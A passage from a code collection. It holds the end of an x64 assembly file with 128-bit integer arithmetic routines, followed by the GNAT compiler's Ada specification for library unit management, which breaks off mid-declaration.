mov rax, qword ptr[r9] ; mul rsi ; add rdx, rcx ; jb L6 ; cmp rdx, qword ptr[r8+8] ; ja L6 ; jb L7 ; cmp rax, qword ptr[r8] ; jbe L7 ; L6: ; dec rsi ; L7: ; xor rdx, rdx ; mov rax, rsi ; L4: ; dec rdi ; jne L8 ; neg rdx ; neg rax ; sbb rdx, 0 ; L8: ; pop rsi ; pop rdi ; pop rbx ; mov qword ptr[r8], rax ; mov qword ptr[r8+8], rdx ; ret ; int128div ENDP ;void int128rem(_int128 &dst, _int128 &x); do assignop dst %= x; if (x < 0) x = -x; !! int128rem PROC push rbx ; push rdi ; mov r8, rcx ; r8 = &dst mov r9, rdx ; r9 = &x xor rdi, rdi ; mov rax, qword ptr[r8+8] ; check sign of dst or rax, rax ; jge L1 ; inc rdi ; mov rdx, qword ptr[r8] ; dst is negative. change sign neg rax ; neg rdx ; sbb rax, 0 ; mov qword ptr[r8+8], rax ; dst = -original dst mov qword ptr[r8], rdx ; L1: ; Assume dst>=0, rdi = (original dst < 0)1:0 mov rax, qword ptr[r9+8] ; check sign of x or rax, rax ; jge L2 ; if(x >= 0) goto L2 mov rdx, qword ptr[r9] ; x is negative. Change sign neg rax ; neg rdx ; sbb rax, 0 ; mov qword ptr[r9+8], rax ; mov qword ptr[r9], rdx ; L2: ; Assume dst>=0 and x > 0, (original dst < 0)1:0. dont care about orignal sign of x or rax, rax ; jne L3 ; mov rcx, qword ptr[r9] ; mov rax, qword ptr[r8+8] ; xor rdx, rdx ; div rcx ; mov rax, qword ptr[r8] ; div rcx ; mov rax, rdx ; xor rdx, rdx ; dec rdi ; jns L4 ; jmp L8 ; L3: ; mov rbx, rax ; mov rcx, qword ptr[r9] ; mov rdx, qword ptr[r8+8] ; mov rax, qword ptr[r8] ; L5: ; shr rbx, 1 ; rcr rcx, 1 ; shr rdx, 1 ; rcr rax, 1 ; or rbx, rbx ; jne L5 ; div rcx ; mov rcx, rax ; mul qword ptr[r9+8] ; xchg rax, rcx ; mul qword ptr[r9] ; add rdx, rcx ; jb L6 ; cmp rdx, qword ptr[r8+8] ; ja L6 ; jb L7 ; cmp rax, qword ptr[r8] ; jbe L7 ; L6: ; sub rax, qword ptr[r9] ; sbb rdx, qword ptr[r9+8] ; L7: ; sub rax, qword ptr[r8] ; sbb rdx, qword ptr[r8+8] ; dec rdi ; jns L8 ; L4: ; neg rdx ; neg rax ; sbb rdx, 0 ; L8: ; pop rdi ; pop rbx ; mov qword ptr[r8], rax ; mov qword ptr[r8+8], rdx ; ret ; int128rem ENDP ;void int128neg(_int128 &x); set x = -x; int128neg PROC mov rax, qword ptr[rcx] neg rax mov qword ptr[rcx], rax mov rax, qword ptr[rcx + 8] adc rax, 0 neg rax mov qword ptr[rcx + 8], rax ret int128neg ENDP ;void int128inc(_int128 &x); set x = x + 1; int128inc PROC add qword ptr[rcx], 1 adc qword ptr[rcx+8], 0 ret int128inc ENDP ;void int128dec(_int128 &x); set x = x - 1; int128dec PROC sub qword ptr[rcx], 1 sbb qword ptr[rcx+8], 0 ret int128dec ENDP ;void int128shr(int shft, _int128 &x); do assignop x >>= shft; (if(x<0) shift 1-bits in from left, else 0-bits) int128shr PROC mov rax, qword ptr[rdx+8] ; rax = x.hi cmp cl, 40h jae More64 ; if(cl >= 64) goto More64; sar qword ptr[rdx+8], cl ; shift x.hi shrd qword ptr[rdx], rax, cl ; shift x.lo taking new bits from x.hi (rax) ret More64: ; assume rax = x.hi cmp cl, 80h jae RetSign ; if(cl >= 128) goto RetSign; sar qword ptr[rdx+8], 3Fh ; set all bits in x.hi to sign-bit and cl, 3Fh ; cl %= 64 sar rax, cl ; rax = x.hi >> cl mov qword ptr[rdx], rax ; x.lo = rax ret RetSign: ; assume rax = x.hi sar rax,3Fh ; set all bits in rax to sign-bit mov qword ptr[rdx], rax mov qword ptr[rdx+8], rax ret int128shr ENDP ;void int128shl(int shft, _int128 &x); do assignop x <<= shft; int128shl PROC cmp cl, 40h jae More64 ; if(cl >= 64) goto More64; mov rax, qword ptr[rdx] ; rax = x.lo shl qword ptr[rdx], cl ; shift x.lo shld qword ptr[rdx+8], rax, cl ; shift x.hi taking new bits from x.lo (rax) ret More64: cmp cl, 80h jae RetZero ; if(cl >= 128) goto RetZero; and cl, 3Fh ; cl %= 64 mov rax, qword ptr[rdx] ; rax = x.lo shl rax, cl ; shift rax (x.lo) mov qword ptr[rdx+8], rax ; x.hi = rax xor rax, rax mov qword ptr[rdx], rax ; x.lo = 0 ret RetZero: xor rax, rax ; return 0 mov qword ptr[rdx], rax mov qword ptr[rdx+8], rax ret int128shl ENDP ;int int128cmp(const _int128 &x1, const _int128 &x2); return sign(x1 - x2); int128cmp PROC mov rax, qword ptr[rcx+8] ; x1.hi cmp rax, qword ptr[rdx+8] ; x2.hi jl lessthan ; signed compare of x1.hi and x2.hi jg greaterthan mov rax, qword ptr[rcx] ; x1.lo cmp rax, qword ptr[rdx] ; x2.lo jb lessthan ; unsigned compare of x1.lo and x2.lo ja greaterthan xor rax, rax ; they are equal ret greaterthan: mov rax, 1 ret lessthan: mov rax, -1 ret int128cmp ENDP ;void uint128div(_uint128 &dst, const _uint128 &x); do assignop dst /= x; uint128div PROC push rbx ; same as signed division push rsi ; but without sign check on arguments mov r8, rcx ; r8 = &dst mov r9, rdx ; r9 = &x mov rax, qword ptr[r9+8] ; or rax, rax ; jne L1 ; mov rcx, qword ptr[r9] mov rax, qword ptr[r8+8] xor rdx, rdx div rcx mov rbx, rax mov rax, qword ptr[r8] div rcx mov rdx, rbx jmp L2 L1: mov rcx, rax mov rbx, qword ptr[r9] mov rdx, qword ptr[r8+8] mov rax, qword ptr[r8] L3: shr rcx, 1 rcr rbx, 1 shr rdx, 1 rcr rax, 1 or rcx, rcx jne L3 div rbx mov rsi, rax mul qword ptr[r9+8] mov rcx, rax mov rax, qword ptr[r9] mul rsi add rdx, rcx jb L4 cmp rdx, qword ptr[r8+8] ja L4 jb L5 cmp rax, qword ptr[r8] jbe L5 L4: dec rsi L5: xor rdx, rdx mov rax, rsi L2: pop rsi pop rbx mov qword ptr[r8], rax mov qword ptr[r8+8], rdx ret uint128div ENDP ; calculates unsigned remainder ;void uint128rem(_uint128 &dst, const _uint128 &x); do assignop dst %= x; uint128rem PROC push rbx mov r8, rcx mov r9, rdx mov rax, qword ptr[r9+8] or rax, rax jne L1 mov rcx, qword ptr[r9] mov rax, qword ptr[r8+8] xor rdx, rdx div rcx mov rax, qword ptr[r8] div rcx mov rax, rdx xor rdx, rdx jmp L2 L1: mov rcx, rax mov rbx, qword ptr[r9] mov rdx, qword ptr[r8+8] mov rax, qword ptr[r8] L3: shr rcx, 1 rcr rbx, 1 shr rdx, 1 rcr rax, 1 or rcx, rcx jne L3 div rbx mov rcx, rax mul qword ptr[r9+8] xchg rax, rcx mul qword ptr[r9] add rdx, rcx jb L4 cmp rdx, qword ptr[r8+8] ja L4 jb L5 cmp rax, qword ptr[r8] jbe L5 L4: sub rax, qword ptr[r9] sbb rdx, qword ptr[r9+8] L5: sub rax, qword ptr[r8] sbb rdx, qword ptr[r8+8] neg rdx neg rax sbb rdx, 0 L2: pop rbx mov qword ptr[r8], rax mov qword ptr[r8+8], rdx ret uint128rem ENDP ;void uint128shr(int shft, void *x); do assignop x >>= shft. always shift 0-bits in from left uint128shr PROC cmp cl, 40h jae More64 ; if(cl >= 64) goto More64; mov rax, qword ptr[rdx+8] ; rax = x.hi shr qword ptr[rdx+8], cl ; shift x.hi shrd qword ptr[rdx], rax, cl ; shift x.lo taking new bits from x.hi (rax) ret More64: cmp cl, 80h jae RetZero ; if(cl >= 128) goto RetZero; and cl, 3Fh ; cl %= 64 mov rax, qword ptr[rdx+8] ; rax = x.hi shr rax, cl ; rax >>= cl mov qword ptr[rdx], rax ; x.lo = rax xor rax, rax mov qword ptr[rdx+8], rax ; x.hi = 0 ret RetZero: xor rax, rax ; return 0 mov qword ptr[rdx], rax mov qword ptr[rdx+8], rax ret uint128shr ENDP ;int uint128cmp(const _uint128 &x1, const _uint128 &x2); return sign(x1 - x2); uint128cmp PROC mov rax, qword ptr[rcx+8] ; x1.hi cmp rax, qword ptr[rdx+8] ; x2.hi jb lessthan ; unsigned compare of x1.hi and x2.hi ja greaterthan mov rax, qword ptr[rcx] ; x1.lo cmp rax, qword ptr[rdx] ; x2.lo jb lessthan ; unsigned compare of x1.lo and x2.lo ja greaterthan xor rax, rax ; they are equal ret greaterthan: mov rax, 1 ret lessthan: mov rax, -1 ret uint128cmp ENDP END
llvm-gcc-4.2-2.9/gcc/ada/lib.ads
vidkidz/crossbridge
1
20899
------------------------------------------------------------------------------ -- -- -- GNAT COMPILER COMPONENTS -- -- -- -- L I B -- -- -- -- S p e c -- -- -- -- Copyright (C) 1992-2006, Free Software Foundation, Inc. -- -- -- -- GNAT is free software; you can redistribute it and/or modify it under -- -- terms of the GNU General Public License as published by the Free Soft- -- -- ware Foundation; either version 2, or (at your option) any later ver- -- -- sion. GNAT is distributed in the hope that it will be useful, but WITH- -- -- OUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY -- -- or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License -- -- for more details. You should have received a copy of the GNU General -- -- Public License distributed with GNAT; see file COPYING. If not, write -- -- to the Free Software Foundation, 51 Franklin Street, Fifth Floor, -- -- Boston, MA 02110-1301, USA. -- -- -- -- As a special exception, if other files instantiate generics from this -- -- unit, or you link this unit with other files to produce an executable, -- -- this unit does not by itself cause the resulting executable to be -- -- covered by the GNU General Public License. This exception does not -- -- however invalidate any other reasons why the executable file might be -- -- covered by the GNU Public License. -- -- -- -- GNAT was originally developed by the GNAT team at New York University. -- -- Extensive contributions were provided by Ada Core Technologies Inc. -- -- -- ------------------------------------------------------------------------------ -- This package contains routines for accessing and outputting the library -- information. It contains the routine to load subsidiary units. with Alloc; with Table; with Types; use Types; package Lib is -------------------------------------------- -- General Approach to Library Management -- -------------------------------------------- -- As described in GNote #1, when a unit is compiled, all its subsidiary -- units are recompiled, including the following: -- (a) Corresponding spec for a body -- (b) Parent spec of a child library spec -- (d) With'ed specs -- (d) Parent body of a subunit -- (e) Subunits corresponding to any specified stubs -- (f) Bodies of inlined subprograms that are called -- (g) Bodies of generic subprograms or packages that are instantiated -- (h) Bodies of packages containing either of the above two items -- (i) Specs and bodies of runtime units -- (j) Parent specs for with'ed child library units -- If a unit is being compiled only for syntax checking, then no subsidiary -- units are loaded, the syntax check applies only to the main unit, -- i.e. the one contained in the source submitted to the library. -- If a unit is being compiled for syntax and semantic checking, then only -- cases (a)-(d) loads are performed, since the full semantic checking can -- be carried out without needing (e)-(i) loads. In this case no object -- file, or library information file, is generated, so the missing units -- do not affect the results. -- Specifications of library subprograms, subunits, and generic specs -- and bodies, can only be compiled in syntax/semantic checking mode, -- since no code is ever generated directly for these units. In the case -- of subunits, only the compilation of the ultimate parent unit generates -- actual code. If a subunit is submitted to the compiler in syntax/ -- semantic checking mode, the parent (or parents in the nested case) are -- semantically checked only up to the point of the corresponding stub. -- If code is being generated, then all the above units are required, -- although the need for bodies of inlined procedures can be suppressed -- by the use of a switch that sets the mode to ignore pragma Inline -- statements. -- The two main sections of the front end, Par and Sem, are recursive. -- Compilation proceeds unit by unit making recursive calls as necessary. -- The process is controlled from the GNAT main program, which makes calls -- to Par and Sem sequence for the main unit. -- Par parses the given unit, and then, after the parse is complete, uses -- the Par.Load subprogram to load all its subsidiary units in categories -- (a)-(d) above, installing pointers to the loaded units in the parse -- tree, as described in a later section of this spec. If any of these -- required units is missing, a fatal error is signalled, so that no -- attempt is made to run Sem in such cases, since it is assumed that -- too many cascaded errors would result, and the confusion would not -- be helpful. -- Following the call to Par on the main unit, the entire tree of required -- units is thus loaded, and Sem is called on the main unit. The parameter -- passed to Sem is the unit to be analyzed. The visibility table, which -- is a single global structure, starts out containing only the entries -- for the visible entities in Standard. Every call to Sem establishes a -- new scope stack table, pushing an entry for Standard on entry to provide -- the proper initial scope environment. -- Sem first proceeds to perform semantic analysis on the currently loaded -- units as follows: -- In the case of a body (case (a) above), Sem analyzes the corresponding -- spec, using a recursive call to Sem. As is always expected to be the -- case with calls to Sem, any entities installed in the visibility table -- are removed on exit from Sem, so that these entities have to be -- reinstalled on return to continue the analysis of the body which of -- course needs visibility of these entities. -- -- In the case of the parent of a child spec (case (b) above), a similar -- call is made to Sem to analyze the parent. Again, on return, the -- entities from the analyzed parent spec have to be installed in the -- visibility table of the caller (the child unit), which must have -- visibility to the entities in its parent spec. -- For with'ed specs (case (c) above), a recursive call to Sem is made -- to analyze each spec in turn. After all the spec's have been analyzed, -- but not till that point, the entities from all the with'ed units are -- reinstalled in the visibility table so that the caller can proceed -- with the analysis of the unit doing the with's with the necessary -- entities made either potentially use visible or visible by selection -- as needed. -- Case (d) arises when Sem is passed a subunit to analyze. This means -- that the main unit is a subunit, and the unit passed to Sem is either -- the main unit, or one of its ancestors that is still a subunit. Since -- analysis must start at the top of the tree, Sem essentially cancels -- the current call by immediately making a call to analyze the parent -- (when this call is finished it immediately returns, so logically this -- call is like a goto). The subunit will then be analyzed at the proper -- time as described for the stub case. Note that we also turn off the -- indication that code should be generated in this case, since the only -- time we generate code for subunits is when compiling the main parent. -- Case (e), subunits corresponding to stubs, are handled as the stubs -- are encountered. There are three sub-cases: -- If the subunit has already been loaded, then this means that the -- main unit was a subunit, and we are back on our way down to it -- after following the initial processing described for case (d). -- In this case we analyze this particular subunit, as described -- for the case where we are generating code, but when we get back -- we are all done, since the rest of the parent is irrelevant. To -- get out of the parent, we raise the exception Subunit_Found, which -- is handled at the outer level of Sem. -- The cases where the subunit has not already been loaded correspond -- to cases where the main unit was a parent. In this case the action -- depends on whether or not we are generating code. If we are not -- generating code, then this is the case where we can simply ignore -- the subunit, since in checking mode we don't even want to insist -- that the subunit exist, much less waste time checking it. -- If we are generating code, then we need to load and analyze -- all subunits. This is achieved with a call to Lib.Load to load -- and parse the unit, followed by processing that installs the -- context clause of the subunit, analyzes the subunit, and then -- removes the context clause (from the visibility chains of the -- parent). Note that we do *not* do a recursive call to Sem in -- this case, precisely because we need to do the analysis of the -- subunit with the current visibility table and scope stack. -- Case (f) applies only to subprograms for which a pragma Inline is -- given, providing that the compiler is operating in the mode where -- pragma Inline's are activated. When the expander encounters a call -- to such a subprogram, it loads the body of the subprogram if it has -- not already been loaded, and calls Sem to process it. -- Case (g) is similar to case (f), except that the body of a generic -- is unconditionally required, regardless of compiler mode settings. -- As in the subprogram case, when the expander encounters a generic -- instantiation, it loads the generic body of the subprogram if it -- has not already been loaded, and calls Sem to process it. -- Case (h) arises when a package contains either an inlined subprogram -- which is called, or a generic which is instantiated. In this case the -- body of the package must be loaded and analyzed with a call to Sem. -- Case (i) is handled by adding implicit with clauses to the context -- clauses of all units that potentially reference the relevant runtime -- entities. Note that since we have the full set of units available, -- the parser can always determine the set of runtime units that is -- needed. These with clauses do not have associated use clauses, so -- all references to the entities must be by selection. Once the with -- clauses have been added, subsequent processing is as for normal -- with clauses. -- Case (j) is also handled by adding appropriate implicit with clauses -- to any unit that withs a child unit. Again there is no use clause, -- and subsequent processing proceeds as for an explicit with clause. -- Sem thus completes the loading of all required units, except those -- required for inline subprogram bodies or inlined generics. If any -- of these load attempts fails, then the expander will not be called, -- even if code was to be generated. If the load attempts all succeed -- then the expander is called, though the attempt to generate code may -- still fail if an error occurs during a load attempt for an inlined -- body or a generic body. ------------------------------------------- -- Special Handling of Subprogram Bodies -- ------------------------------------------- -- A subprogram body (in an adb file) may stand for both a spec and a -- body. A simple model (and one that was adopted through version 2.07), -- is simply to assume that such an adb file acts as its own spec if no -- ads file is present. -- However, this is not correct. RM 10.1.4(4) requires that such a body -- act as a spec unless a subprogram declaration of the same name is -- already present. The correct interpretation of this in GNAT library -- terms is to ignore an existing ads file of the same name unless this -- ads file contains a subprogram declaration with the same name. -- If there is an ads file with a unit other than a subprogram declaration -- with the same name, then a fatal message is output, noting that this -- irrelevant file must be deleted before the body can be compiled. See -- ACVC test CA1020D to see how this processing is required. ----------------- -- Global Data -- ----------------- Current_Sem_Unit : Unit_Number_Type := Main_Unit; -- Unit number of unit currently being analyzed/expanded. This is set when -- ever a new unit is entered, saving and restoring the old value, so that -- it always reflects the unit currently being analyzed. The initial value -- of Main_Unit ensures that a proper value is set initially, and in -- particular for analysis of configuration pragmas in gnat.adc. Main_Unit_Entity : Entity_Id; -- Entity of main unit, same as Cunit_Entity (Main_Unit) except where -- Main_Unit is a body with a separate spec, in which case it is the -- entity for the spec. ----------------- -- Units Table -- ----------------- -- The units table has an entry for each unit (source file) read in by the -- current compilation. The table is indexed by the unit number value, -- The first entry in the table, subscript Main_Unit, is for the main file. -- Each entry in this units table contains the following data. -- Unit_File_Name -- The name of the source file containing the unit. Set when the entry -- is created by a call to Lib.Load, and then cannot be changed. -- Source_Index -- The index in the source file table of the corresponding source file. -- Set when the entry is created by a call to Lib.Load and then cannot -- be changed. -- Munit_Index -- The index of the unit within the file for multiple unit per file -- mode. Set to zero in normal single unit per file mode. -- Error_Location -- This is copied from the Sloc field of the Enode argument passed -- to Load_Unit. It refers to the enclosing construct which caused -- this unit to be loaded, e.g. most typically the with clause that -- referenced the unit, and is used for error handling in Par.Load. -- Expected_Unit -- This is the expected unit name for a file other than the main unit, -- since these are cases where we load the unit using Lib.Load and we -- know the unit that is expected. It must be the same as Unit_Name -- if it is set (see test in Par.Load). Expected_Unit is set to -- No_Name for the main unit. -- Unit_Name -- The name of the unit. Initialized to No_Name by Lib.Load, and then -- set by the parser when the unit is parsed to the unit name actually -- found in the file (which should, in the absence of errors) be the -- same name as Expected_Unit. -- Cunit -- Pointer to the N_Compilation_Unit node. Initially set to Empty by -- Lib.Load, and then reset to the required node by the parser when -- the unit is parsed. -- Cunit_Entity -- Pointer to the entity node for the compilation unit. Initially set -- to Empty by Lib.Load, and then reset to the required entity by the -- parser when the unit is parsed. -- Dependency_Num -- This is the number of the unit within the generated dependency -- lines (D lines in the ALI file) which are sorted into alphabetical -- order. The number is ones origin, so a value of 2 refers to the -- second generated D line. The Dependency_Number values are set -- as the D lines are generated, and are used to generate proper -- unit references in the generated xref information. -- Dynamic_Elab -- A flag indicating if this unit was compiled with dynamic elaboration -- checks specified (as the result of using the -gnatE compilation -- option or a pragma Elaboration_Checks (Dynamic). -- Fatal_Error -- A flag that is initialized to False, and gets set to True if a fatal -- error occurs during the processing of a unit. A fatal error is one -- defined as serious enough to stop the next phase of the compiler -- from running (i.e. fatal error during parsing stops semantics, -- fatal error during semantics stops code generation). Note that -- currently, errors of any kind cause Fatal_Error to be set, but -- eventually perhaps only errors labeled as Fatal_Errors should be -- this severe if we decide to try Sem on sources with minor errors. -- Generate_Code -- This flag is set True for all units in the current file for which -- code is to be generated. This includes the unit explicitly compiled, -- together with its specification, and any subunits. -- Has_RACW -- A Boolean flag, initially set to False when a unit entry is created, -- and set to True if the unit defines a remote access to class wide -- (RACW) object. This is used for controlling generation of the RA -- attribute in the ali file. -- Ident_String -- N_String_Literal node from a valid pragma Ident that applies to -- this unit. If no Ident pragma applies to the unit, then Empty. -- Loading -- A flag that is used to catch circular WITH dependencies. It is set -- True when an entry is initially created in the file table, and set -- False when the load is completed, or ends with an error. -- Main_Priority -- This field is used to indicate the priority of a possible main -- program, as set by a pragma Priority. A value of -1 indicates -- that the default priority is to be used (and is also used for -- entries that do not correspond to possible main programs). -- Serial_Number -- This field holds a serial number used by New_Internal_Name to -- generate unique temporary numbers on a unit by unit basis. The -- only access to this field is via the Increment_Serial_Number -- routine which increments the current value and returns it. This -- serial number is separate for each unit. -- Version -- This field holds the version of the unit, which is computed as -- the exclusive or of the checksums of this unit, and all its -- semantically dependent units. Access to the version number field -- is not direct, but is done through the routines described below. -- When a unit table entry is created, this field is initialized to -- the checksum of the corresponding source file. Version_Update is -- then called to reflect the contributions of any unit on which this -- unit is semantically dependent. -- The units table is reset to empty at the start of the compilation of -- each main unit by Lib.Initialize. Entries are then added by calls to -- the Lib.Load procedure. The following subprograms are used to access -- and modify entries in the Units table. Individual entries are accessed -- using a unit number value which ranges from Main_Unit (the first entry, -- which is always for the current main unit) to Last_Unit. Default_Main_Priority : constant Int := -1; -- Value used in Main_Priority field to indicate default main priority function Cunit (U : Unit_Number_Type) return Node_Id; function Cunit_Entity (U : Unit_Number_Type) return Entity_Id; function Dependency_Num (U : Unit_Number_Type) return Nat; function Dynamic_Elab (U : Unit_Number_Type) return Boolean; function Error_Location (U : Unit_Number_Type) return Source_Ptr; function Expected_Unit (U : Unit_Number_Type) return Unit_Name_Type; function Fatal_Error (U : Unit_Number_Type) return Boolean; function Generate_Code (U : Unit_Number_Type) return Boolean; function Ident_String (U : Unit_Number_Type) return Node_Id; function Has_RACW (U : Unit_Number_Type) return Boolean; function Loading (U : Unit_Number_Type) return Boolean; function Main_Priority (U : Unit_Number_Type) return Int; function Munit_Index (U : Unit_Number_Type) return Nat; function Source_Index (U : Unit_Number_Type) return Source_File_Index; function Unit_File_Name (U : Unit_Number_Type) return File_Name_Type; function Unit_Name (U : Unit_Number_Type) return Unit_Name_Type; -- Get value of named field from given units table entry procedure Set_Cunit (U : Unit_Number_Type; N : Node_Id); procedure Set_Cunit_Entity (U : Unit_Number_Type; E : Entity_Id); procedure Set_Dynamic_Elab (U : Unit_Number_Type; B : Boolean := True); procedure Set_Error_Location (U : Unit_Number_Type; W : Source_Ptr); procedure Set_Fatal_Error (U : Unit_Number_Type; B : Boolean := True); procedure Set_Generate_Code (U : Unit_Number_Type; B : Boolean := True); procedure Set_Has_RACW (U : Unit_Number_Type; B : Boolean := True); procedure Set_Ident_String (U : Unit_Number_Type; N : Node_Id); procedure Set_Loading (U : Unit_Number_Type; B : Boolean := True); procedure Set_Main_Priority (U : Unit_Number_Type; P : Int); procedure Set_Unit_Name (U : Unit_Number_Type; N : Unit_Name_Type); -- Set value of named field for given units table entry. Note that we -- do not have an entry for each possible field, since some of the fields -- can only be set by specialized interfaces (defined below). function Version_Get (U : Unit_Number_Type) return Word_Hex_String; -- Returns the version as a string with 8 hex digits (upper case letters) function Last_Unit return Unit_Number_Type; -- Unit number of last allocated unit function Num_Units return Nat; -- Number of units currently in unit table procedure Remove_Unit (U : Unit_Number_Type); -- Remove unit U from unit table. Currently this is effective only -- if U is the last unit currently stored in the unit table. function Entity_Is_In_Main_Unit (E : Entity_Id) return Boolean; -- Returns True if the entity E is declared in the main unit, or, in -- its corresponding spec, or one of its subunits. Entities declared -- within generic instantiations return True if the instantiation is -- itself "in the main unit" by this definition. Otherwise False. function Get_Source_Unit (N : Node_Or_Entity_Id) return Unit_Number_Type; pragma Inline (Get_Source_Unit); function Get_Source_Unit (S : Source_Ptr) return Unit_Number_Type; -- Return unit number of file identified by given source pointer value. -- This call must always succeed, since any valid source pointer value -- belongs to some previously loaded module. If the given source pointer -- value is within an instantiation, this function returns the unit number -- of the template, i.e. the unit containing the source code corresponding -- to the given Source_Ptr value. The version taking a Node_Id argument, N, -- simply applies the function to Sloc (N). function Get_Code_Unit (N : Node_Or_Entity_Id) return Unit_Number_Type; pragma Inline (Get_Code_Unit); function Get_Code_Unit (S : Source_Ptr) return Unit_Number_Type; -- This is like Get_Source_Unit, except that in the instantiation case, -- it uses the location of the top level instantiation, rather than the -- template, so it returns the unit number containing the code that -- corresponds to the node N, or the source location S. function In_Same_Source_Unit (N1, N2 : Node_Or_Entity_Id) return Boolean; pragma Inline (In_Same_Source_Unit); -- Determines if the two nodes or entities N1 and N2 are in the same -- source unit, the criterion being that Get_Source_Unit yields the -- same value for each argument. function In_Same_Code_Unit (N1, N2 : Node_Or_Entity_Id) return Boolean; pragma Inline (In_Same_Code_Unit); -- Determines if the two nodes or entities N1 and N2 are in the same -- code unit, the criterion being that Get_Code_Unit yields the same -- value for each argument. function In_Same_Extended_Unit (N1, N2 : Node_Or_Entity_Id) return Boolean; pragma Inline (In_Same_Extended_Unit); -- Determines if two nodes or entities N1 and N2 are in the same -- extended unit, where an extended unit is defined as a unit and all -- its subunits (considered recursively, i.e. subunits of subunits are -- included). Returns true if S1 and S2 are in the same extended unit -- and False otherwise. function In_Same_Extended_Unit (S1, S2 : Source_Ptr) return Boolean; pragma Inline (In_Same_Extended_Unit); -- Determines if the two source locations S1 and S2 are in the same -- extended unit, where an extended unit is defined as a unit and all -- its subunits (considered recursively, i.e. subunits of subunits are -- included). Returns true if S1 and S2 are in the same extended unit -- and False otherwise. function In_Extended_Main_Code_Unit (N : Node_Or_Entity_Id) return Boolean; -- Return True if the node is in the generated code of the extended main -- unit, defined as the main unit, its specification (if any), and all -- its subunits (considered recursively). Units for which this enquiry -- returns True are those for which code will be generated. Nodes from -- instantiations are included in the extended main unit for this call. -- If the main unit is itself a subunit, then the extended main unit -- includes its parent unit, and the parent unit spec if it is separate. function In_Extended_Main_Code_Unit (Loc : Source_Ptr) return Boolean; -- Same function as above, but argument is a source pointer rather -- than a node. function In_Extended_Main_Source_Unit (N : Node_Or_Entity_Id) return Boolean; -- Return True if the node is in the source text of the extended main -- unit, defined as the main unit, its specification (if any), and all -- its subunits (considered recursively). Units for which this enquiry -- returns True are those for which code will be generated. This differs -- from In_Extended_Main_Code_Unit only in that instantiations are not -- included for the purposes of this call. If the main unit is itself -- a subunit, then the extended main unit includes its parent unit, -- and the parent unit spec if it is separate. function In_Extended_Main_Source_Unit (Loc : Source_Ptr) return Boolean; -- Same function as above, but argument is a source pointer rather -- than a node. function Earlier_In_Extended_Unit (S1, S2 : Source_Ptr) return Boolean; -- Given two Sloc values for which In_Same_Extended_Unit is true, -- determine if S1 appears before S2. Returns True if S1 appears before -- S2, and False otherwise. The result is undefined if S1 and S2 are -- not in the same extended unit. function Compilation_Switches_Last return Nat; -- Return the count of stored compilation switches function Get_Compilation_Switch (N : Pos) return String_Ptr; -- Return the Nth stored compilation switch, or null if less than N -- switches have been stored. Used by ASIS and back ends written in Ada. function Get_Cunit_Unit_Number (N : Node_Id) return Unit_Number_Type; -- Return unit number of the unit whose N_Compilation_Unit node is the -- one passed as an argument. This must always succeed since the node -- could not have been built without making a unit table entry. function Get_Cunit_Entity_Unit_Number (E : Entity_Id) return Unit_Number_Type; -- Return unit number of the unit whose compilation unit spec entity is -- the one passed as an argument. This must always succeed since the -- entity could not have been built without making a unit table entry. function Increment_Serial_Number return Nat; -- Increment Serial_Number field for current unit, and return the -- incremented value. procedure Synchronize_Serial_Number; -- This function increments the Serial_Number field for the current -- unit but does not return the incremented value. This is used when -- there is a situation where one path of control increments a serial -- number (using Increment_Serial_Number), and the other path does not -- and it is important to keep the serial numbers synchronized in the -- two cases (e.g. when the references in a package and a client must -- be kept consistent). procedure Replace_Linker_Option_String (S : String_Id; Match_String : String); -- Replace an existing Linker_Option if the prefix Match_String -- matches, otherwise call Store_Linker_Option_String. procedure Store_Compilation_Switch (Switch : String); -- Called to register a compilation switch, either front-end or -- back-end, which may influence the generated output file(s). procedure Disable_Switch_Storing; -- Disable the registration of compilation switches with -- Store_Compilation_Switch. This is used to not register switches added -- automatically by the gcc driver. procedure Store_Linker_Option_String (S : String_Id); -- This procedure is called to register the string from a pragma -- Linker_Option. The argument is the Id of the string to register. procedure Initialize; -- Initialize internal tables procedure Lock; -- Lock internal tables before calling back end procedure Tree_Read; -- Initializes internal tables from current tree file using the relevant -- Table.Tree_Read routines. procedure Tree_Write; -- Writes out internal tables to current tree file using the relevant -- Table.Tree_Write routines. function Is_Loaded (Uname : Unit_Name_Type) return Boolean; -- Determines if unit with given name is already loaded, i.e. there is -- already an entry in the file table with this unit name for which the -- corresponding file was found and parsed. Note that the Fatal_Error flag -- of this entry must be checked before proceeding with further processing. procedure Version_Referenced (S : String_Id); -- This routine is called from Exp_Attr to register the use of a Version -- or Body_Version attribute. The argument is the external name used to -- access the version string. procedure List (File_Names_Only : Boolean := False); -- Lists units in active library (i.e. generates output consisting of a -- sorted listing of the units represented in File table, with the -- exception of the main unit). If File_Names_Only is set to True, then -- the list includes only file names, and no other information. Otherwise -- the unit name and time stamp are also output. File_Names_Only also -- restricts the list to exclude any predefined files. function Generic_Separately_Compiled (E : Entity_Id) return Boolean; -- This is the old version of tbe documentation of this function: -- -- Most generic units must be separately compiled. Since we always use -- macro substitution for generics, the resulting object file is a dummy -- one with no code, but the ali file has the normal form, and we need -- this ali file so that the binder can work out a correct order of -- elaboration. However, we do not need to separate compile generics -- if the generic files are language defined, since in this case there -- are no order of elaborration problems, and we can simply incorporate -- the context clause of the generic unit into the client. There are two -- reasons for making this exception for predefined units. First, clearly -- it is more efficient not to introduce extra unnecessary files. Second, -- the old version of GNAT did not compile any generic units. That was -- clearly incorrect in some cases of complex order of elaboration and -- was fixed in version 3.10 of GNAT. However, the transition would have -- caused bootstrap path problems in the case of generics used in the -- compiler itself. The only such generics are predefined ones. This -- function returns True if the given generic unit entity E is for a -- generic unit that should be separately compiled, and false otherwise. -- -- Now GNAT can compile any generic unit including predefined ones, but -- because of the backward compatibility (to keep the ability to use old -- compiler versions to build GNAT) compiling library generics is an -- option. That is, now GNAT compiles a library generic as an ordinary -- unit, but it also can build an exeutable in case if its library -- contains some (or all) predefined generics non compiled. See 9628-002 -- for the description of changes to be done to get rid of a special -- processing of library generic. -- -- So now this function returns TRUE if a generic MUST be separately -- compiled with the current approach. function Generic_Separately_Compiled (Sfile : File_Name_Type) return Boolean; -- Same as the previous function, but works directly on a unit file name private pragma Inline (Cunit); pragma Inline (Cunit_Entity); pragma Inline (Dependency_Num); pragma Inline (Fatal_Error); pragma Inline (Generate_Code); pragma Inline (Has_RACW); pragma Inline (Increment_Serial_Number); pragma Inline (Loading); pragma Inline (Main_Priority); pragma Inline (Munit_Index); pragma Inline 